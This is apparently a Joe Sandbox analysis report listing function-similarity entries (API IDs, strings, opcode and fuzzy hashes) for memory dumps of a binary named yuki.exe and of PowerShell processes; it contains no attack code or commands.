                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                      • Instruction ID: c885c72a69a50b80128e38c311529dc889c9740261a173877ed40ea9786069d5
                                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                      • Instruction Fuzzy Hash: 9081B172E4C28785F7759E39837827836A0AB11B46F958035CE89D76D9CF3DE8029389
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                      • Instruction ID: 97d76c05296c22e8919b30e7001ee57a48fd12724c2c82a47ecb6ba390e2d3fa
                                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                      • Instruction Fuzzy Hash: EC518032A296438ADB24CF25D444A7877D1EB54F9AF114234DA8EC7B48DF7DE841C708
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                      • Instruction ID: fa9841c484b047f7b71e794f6a89611c934b314019bcdedbe7416e3715172fe7
                                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                      • Instruction Fuzzy Hash: D9516D72A0868386EB748E31904426877E0EB65F96F184136DACDD7F95CFBCE491C709
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                      • Instruction ID: 6038bb4b60d3941f5a60936e4a8d872946e25377cb57ae1d7f4ef426ad091382
                                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                      • Instruction Fuzzy Hash: F3618E32908BC685EB708F25E4403AAB7A0FB95B85F044225EBDD87B99CF7CD194CB04
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                      • API String ID: 2030045667-255084403
                                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                      • Instruction ID: a8182fa6e60e596387793ee53a6a88a1eed1070266e79f690ae243e58339ed2b
                                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                      • Instruction Fuzzy Hash: AE21BF72B08B4192E7209F24B5487AA63A0EB88781F404136EE8D93A6ADF3CD645C744
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                      • Instruction ID: aefbf47fffd8fa8cb7f93064d113c78bb81760ffaa622af23a1a0060a50033de
                                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                      • Instruction Fuzzy Hash: CFD113B2B08A858AE720CFB5C6542AC37B1FB54799B114235DE8D97B99DF3CD406C348
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 1956198572-0
                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                      • Instruction ID: 7b2c5100c7f768e885caeb321d235650d965e148de4ae15f86ac4c55811523f3
                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                      • Instruction Fuzzy Hash: AC11A931B1C14342F6749F79E5882B952E1EF98B81F548034EBC987F99CD2DD896C60C
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                      • String ID: ?
                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                      • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                      • Instruction ID: 7c0baedb03397b279cf5a8c52c083931d8288db5b94cba05b72bf5bed5135468
                                                                                                      • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                      • Instruction Fuzzy Hash: 3A412822B0868256F7708F35D70937A6690EB80BA5F244275EEDC87BD9DF3DD8418784
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C8209046
                                                                                                        • Part of subcall function 00007FF6C820A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A95E
                                                                                                        • Part of subcall function 00007FF6C820A948: GetLastError.KERNEL32(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A968
                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6C81FCBA5), ref: 00007FF6C8209064
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Users\user\Desktop\yuki.exe
                                                                                                      • API String ID: 3580290477-2847334576
                                                                                                      • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                      • Instruction ID: eb9cb6d06bf9c65a0beb4a70dfdbd2f1f692f45dd968791764fad9c45b20e517
                                                                                                      • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                      • Instruction Fuzzy Hash: E841A531A0879296EB24DF35DA680BD63A5FF447D2B554035E98E83B85DF3DE481C384
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                      • Instruction ID: 0fcfc1eec4869fd6361d4db182643167b72034e1386b6717e51524914d017f97
                                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                      • Instruction Fuzzy Hash: 4641B072B18A8582DB308F25E5583AA67A0FB98B95F514135EE8DC7B98EF3CD401C784
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory
                                                                                                      • String ID: :
                                                                                                      • API String ID: 1611563598-336475711
                                                                                                      • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                      • Instruction ID: 510b832a690bb55033dff44989c1d248c004dccbe3677d311af4e68a8558f880
                                                                                                      • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                      • Instruction Fuzzy Hash: 6321F272E0828181EB309F21D26826D73B1FB98B85F964135DADD836D4CF7CE9458B84
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                      • Instruction ID: f247602f7c3297e746f2ba2a318fd1b5e5d18be2de3d67c7a022607434b6bdb3
                                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                      • Instruction Fuzzy Hash: F2118E32608B8182EB618F25E44425977E0FB88B85F584230DBCD47B64DF7CC451C704
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                      • String ID: :
                                                                                                      • API String ID: 2595371189-336475711
                                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                      • Instruction ID: d0a9fa42b5944ed47dcb4dc6551e25a80178cf7b07ad9e5c0232eb8bfe0ad68b
                                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                      • Instruction Fuzzy Hash: 9201D42191820381F730AF70A52D27E63A0EF58749F900036D58DC2A91DF2DE9059B4C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980655971.00007FFD98BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8bfb54515ce13a3ae7786b425cae6ce4788ce35bea6ddba1993d49e79aded6a3
                                                                                                      • Instruction ID: cbb587cf206bea89b4b74ddc18c8b481c0800a57924504c9832bd40a453e2934
                                                                                                      • Opcode Fuzzy Hash: 8bfb54515ce13a3ae7786b425cae6ce4788ce35bea6ddba1993d49e79aded6a3
                                                                                                      • Instruction Fuzzy Hash: 3F021330A18A4D8FDB98EF5CC4A5EADB7E1FF68314F14416AD40DD7296CA34E842CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1981086858.00007FFD98C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98c90000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2094b5d8b1ec93588795a47859f166825d0007f9f0a53af6271e7d1456c77d8c
                                                                                                      • Instruction ID: 828a82aad1b7a42913fa3882e3392971655f2941ecc9885de9fa5b79029459ed
                                                                                                      • Opcode Fuzzy Hash: 2094b5d8b1ec93588795a47859f166825d0007f9f0a53af6271e7d1456c77d8c
                                                                                                      • Instruction Fuzzy Hash: 82D14A32B0EAC94FEBA59B6848759B97F90EF16750B4800FEE08DCB1D7D919AC05C345
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980655971.00007FFD98BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5f83918492cceb463bb46111d127e85ec45ff1b4d433232c364b6501037369a
                                                                                                      • Instruction ID: 8c4e739b935c01d7f05bf56a17993b914e71b56252c4db17f5dc5e13edb376f4
                                                                                                      • Opcode Fuzzy Hash: f5f83918492cceb463bb46111d127e85ec45ff1b4d433232c364b6501037369a
                                                                                                      • Instruction Fuzzy Hash: 3C11886580E7C84FD713AB784C39698BFB0AE27244B5E01DBD0C8CB0F3D6195808C3A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980655971.00007FFD98BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 940f0af932513f86200a6bbfdcfd2474f59f52b57170bb6eccb4309c45ee4785
                                                                                                      • Instruction ID: 3f3f4d007465da5ad954c59f7a651a3a6fc47d768e85c367f6c800d0124d8ded
                                                                                                      • Opcode Fuzzy Hash: 940f0af932513f86200a6bbfdcfd2474f59f52b57170bb6eccb4309c45ee4785
                                                                                                      • Instruction Fuzzy Hash: 64412671A0CA4C4FEBA4EB5CD85ABF97BE0EB95321F44417BD00DC7156DE24A846C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980655971.00007FFD98BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0b9ed9616782926da623c4b5fa6e4050e4365f298406f961ff1c9a7d94f357db
                                                                                                      • Instruction ID: a5b587e6f78c66db92b4878b26da35dd5b10089f036f2799ff59ee4d0e791b48
                                                                                                      • Opcode Fuzzy Hash: 0b9ed9616782926da623c4b5fa6e4050e4365f298406f961ff1c9a7d94f357db
                                                                                                      • Instruction Fuzzy Hash: 0D31F63191CB488FDB18DB5C9C4A6A97BE0FB59720F04426FE449C3292DB74A855CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980655971.00007FFD98BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e1a552c49f6c54647505dc06e6cb4f8ea5610a7532df622061b379d376e99046
                                                                                                      • Instruction ID: f87a50902dd0c95d338e840c0e304f04af50545c79912eaca7a7302ca0e80bdb
                                                                                                      • Opcode Fuzzy Hash: e1a552c49f6c54647505dc06e6cb4f8ea5610a7532df622061b379d376e99046
                                                                                                      • Instruction Fuzzy Hash: 7E31E97190DA884FEB65DBAC8C5ABE97FE0DF56720F4841ABD048C7153D9285809C791
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980000829.00007FFD98AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98AAD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98aad000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b49501f2ac08d738d93e806faca9e5eb1f6ed6114a4a39edff481379b304ce0
                                                                                                      • Instruction ID: 3a6b9cb3eaaa5bff628674b11016f2716c40db1afef555f9825eb58db751cd5c
                                                                                                      • Opcode Fuzzy Hash: 6b49501f2ac08d738d93e806faca9e5eb1f6ed6114a4a39edff481379b304ce0
                                                                                                      • Instruction Fuzzy Hash: D841377140EBC44FE7569B3998559523FF0EF52320B1906DFD088CB5A3D629F84AC7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980655971.00007FFD98BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction ID: 29cae14fbf3553e50ac32c68f670d062bd87a39af91068e470ecb09fb0097de6
                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction Fuzzy Hash: 6401A73020CB0C4FD744EF0CE051AA5B3E0FB89324F50052DE58AC3691DA32E882CB46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1981086858.00007FFD98C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98c90000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8039378a77a411baff7ca7282f82005bfb2cb2162a065350f1ceb69a0cf8d469
